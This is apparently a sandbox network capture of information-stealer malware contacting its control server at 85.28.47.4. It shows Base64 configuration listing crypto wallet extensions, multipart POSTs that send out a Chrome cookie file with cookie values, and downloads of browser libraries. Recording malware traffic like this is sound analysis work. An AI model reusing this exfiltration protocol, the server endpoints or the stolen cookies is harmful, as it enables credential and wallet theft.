Jul 3, 2024 18:08:01.906357050 CEST	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Jul 3, 2024 18:08:01.906369925 CEST	1236	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Jul 3, 2024 18:08:01.906383991 CEST	1236	IN	Data Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
Jul 3, 2024 18:08:01.906397104 CEST	700	IN	Data Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58 Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
Jul 3, 2024 18:08:01.908370018 CEST	465	OUT	POST /920475a59bac849d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGIEGHJEGHJKFIEBFHJK Host: 85.28.47.4 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 61 63 61 35 64 30 37 65 35 37 63 32 38 34 33 38 66 65 65 39 30 62 66 32 66 35 63 64 39 33 30 35 38 37 35 38 37 34 39 66 34 33 37 61 31 62 63 65 61 63 38 36 31 36 39 30 31 65 37 38 39 31 32 36 36 63 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 2d 2d 0d 0a Data Ascii: ------CGIEGHJEGHJKFIEBFHJKContent-Disposition: form-data; name="token"343aca5d07e57c28438fee90bf2f5cd93058758749f437a1bceac8616901e7891266c402------CGIEGHJEGHJKFIEBFHJKContent-Disposition: form-data; name="message"fplugins------CGIEGHJEGHJKFIEBFHJK--
Jul 3, 2024 18:08:02.086592913 CEST	335	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 16:08:02 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Jul 3, 2024 18:08:02.106827021 CEST	198	OUT	POST /920475a59bac849d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHCBAAEHCFIDGDHJEHC Host: 85.28.47.4 Content-Length: 7139 Connection: Keep-Alive Cache-Control: no-cache
Jul 3, 2024 18:08:02.106873989 CEST	7139	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 43 42 41 41 45 48 43 46 49 44 47 44 48 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 61 63 61 Data Ascii: ------DGHCBAAEHCFIDGDHJEHCContent-Disposition: form-data; name="token"343aca5d07e57c28438fee90bf2f5cd93058758749f437a1bceac8616901e7891266c402------DGHCBAAEHCFIDGDHJEHCContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Jul 3, 2024 18:08:23.716537952 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 16:08:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 3, 2024 18:08:23.970573902 CEST	89	OUT	GET /69934896f997d5bb/sqlite3.dll HTTP/1.1 Host: 85.28.47.4 Cache-Control: no-cache
Jul 3, 2024 18:08:24.331613064 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 16:08:24 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT ETag: "10e436-5e7eeebed8d80" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Jul 3, 2024 18:08:24.331676960 CEST	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Jul 3, 2024 18:08:24.331687927 CEST	448	IN	Data Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26 Data Ascii: tu.\|$\$4$\|$\$4$du1Hga[^_]&+C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q
Jul 3, 2024 18:08:24.331697941 CEST	1236	IN	Data Raw: 0e 70 eb 61 89 04 24 ff 15 80 02 ed 61 52 52 89 c2 85 d2 74 09 c7 04 24 78 67 eb 61 ff d2 c7 04 24 96 14 e0 61 e8 fc e2 0a 00 c9 c3 55 89 e5 5d c3 90 03 14 85 a0 c3 ec 61 55 89 e5 89 14 85 a0 c3 ec 61 83 c0 08 3b 14 85 a8 c3 ec 61 76 07 89 14 85 Data Ascii: pa$aRRt$xga$aU]aUa;ava]tUS$R[]UWVS,u}L$T$$t$\|$S,[^_]UWVS,u}L$T$$t$\|$S,[^_]UV0T$L$$V^]
Jul 3, 2024 18:08:24.331708908 CEST	1236	IN	Data Raw: 08 8d 7e ff 38 da 75 0d 3a 54 08 01 75 0f 88 54 30 ff 41 eb 04 88 5c 30 ff 41 46 eb e1 5b c6 04 38 00 5e 5f 5d c3 55 89 e5 56 53 31 db 0f b6 0c 18 0f b6 34 1a 39 f1 75 06 85 c9 75 14 eb 15 0f b6 89 e0 a2 ec 61 0f b6 b6 e0 a2 ec 61 29 f1 75 03 43 Data Ascii: ~8u:TuT0A\0AF[8^_]UVS149uuaa)uC[^]UEUu1t]]UWVMSU}u1KtBOG1x4aa)t2a8auAB[^_]U1
Jul 3, 2024 18:08:25.488080978 CEST	948	OUT	POST /920475a59bac849d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDHIDHIEGIIIECAKEBFB Host: 85.28.47.4 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 61 63 61 35 64 30 37 65 35 37 63 32 38 34 33 38 66 65 65 39 30 62 66 32 66 35 63 64 39 33 30 35 38 37 35 38 37 34 39 66 34 33 37 61 31 62 63 65 61 63 38 36 31 36 39 30 31 65 37 38 39 31 32 36 36 63 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="token"343aca5d07e57c28438fee90bf2f5cd93058758749f437a1bceac8616901e7891266c402------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3LWdUY1dxSHZadlpiYWZPcGtxUnkwZEx5WUc5QWpQMnZiVUJvbWFybmM5cGNaVmxoSGtVZVVhV011ckQwR0dYeVcwNV9CXzFJeVVOWUVFTG15cVJnCi5nb29nbGUuY29tCVRSVUUJLwlGQUxTRQkxNjk5MDcxNjQwCTFQX0pBUgkyMDIzLTEwLTA1LTA2Cg==------GDHIDHIEGIIIECAKEBFB--
Jul 3, 2024 18:08:33.894469976 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 16:08:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 3, 2024 18:08:33.997443914 CEST	556	OUT	POST /920475a59bac849d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KECBFBAEBKJJJJKFCGCB Host: 85.28.47.4 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 61 63 61 35 64 30 37 65 35 37 63 32 38 34 33 38 66 65 65 39 30 62 66 32 66 35 63 64 39 33 30 35 38 37 35 38 37 34 39 66 34 33 37 61 31 62 63 65 61 63 38 36 31 36 39 30 31 65 37 38 39 31 32 36 36 63 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 [TRUNCATED] Data Ascii: ------KECBFBAEBKJJJJKFCGCBContent-Disposition: form-data; name="token"343aca5d07e57c28438fee90bf2f5cd93058758749f437a1bceac8616901e7891266c402------KECBFBAEBKJJJJKFCGCBContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------KECBFBAEBKJJJJKFCGCBContent-Disposition: form-data; name="file"------KECBFBAEBKJJJJKFCGCB--
Jul 3, 2024 18:08:34.916898012 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 16:08:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 3, 2024 18:08:35.507653952 CEST	556	OUT	POST /920475a59bac849d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJKJEHJKJEBGHJJKEBGI Host: 85.28.47.4 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 61 63 61 35 64 30 37 65 35 37 63 32 38 34 33 38 66 65 65 39 30 62 66 32 66 35 63 64 39 33 30 35 38 37 35 38 37 34 39 66 34 33 37 61 31 62 63 65 61 63 38 36 31 36 39 30 31 65 37 38 39 31 32 36 36 63 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b [TRUNCATED] Data Ascii: ------HJKJEHJKJEBGHJJKEBGIContent-Disposition: form-data; name="token"343aca5d07e57c28438fee90bf2f5cd93058758749f437a1bceac8616901e7891266c402------HJKJEHJKJEBGHJJKEBGIContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------HJKJEHJKJEBGHJJKEBGIContent-Disposition: form-data; name="file"------HJKJEHJKJEBGHJJKEBGI--
Jul 3, 2024 18:08:36.564296007 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 16:08:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 3, 2024 18:08:36.895472050 CEST	89	OUT	GET /69934896f997d5bb/freebl3.dll HTTP/1.1 Host: 85.28.47.4 Cache-Control: no-cache
Jul 3, 2024 18:08:37.072345018 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 16:08:36 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "a7550-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Jul 3, 2024 18:08:37.728967905 CEST	89	OUT	GET /69934896f997d5bb/mozglue.dll HTTP/1.1 Host: 85.28.47.4 Cache-Control: no-cache
Jul 3, 2024 18:08:37.906506062 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 16:08:37 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "94750-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Jul 3, 2024 18:08:38.389833927 CEST	90	OUT	GET /69934896f997d5bb/msvcp140.dll HTTP/1.1 Host: 85.28.47.4 Cache-Control: no-cache
Jul 3, 2024 18:08:38.568196058 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 16:08:38 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "6dde8-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Jul 3, 2024 18:08:38.883764029 CEST	86	OUT	GET /69934896f997d5bb/nss3.dll HTTP/1.1 Host: 85.28.47.4 Cache-Control: no-cache
Jul 3, 2024 18:08:39.069670916 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 16:08:38 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "1f3950-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
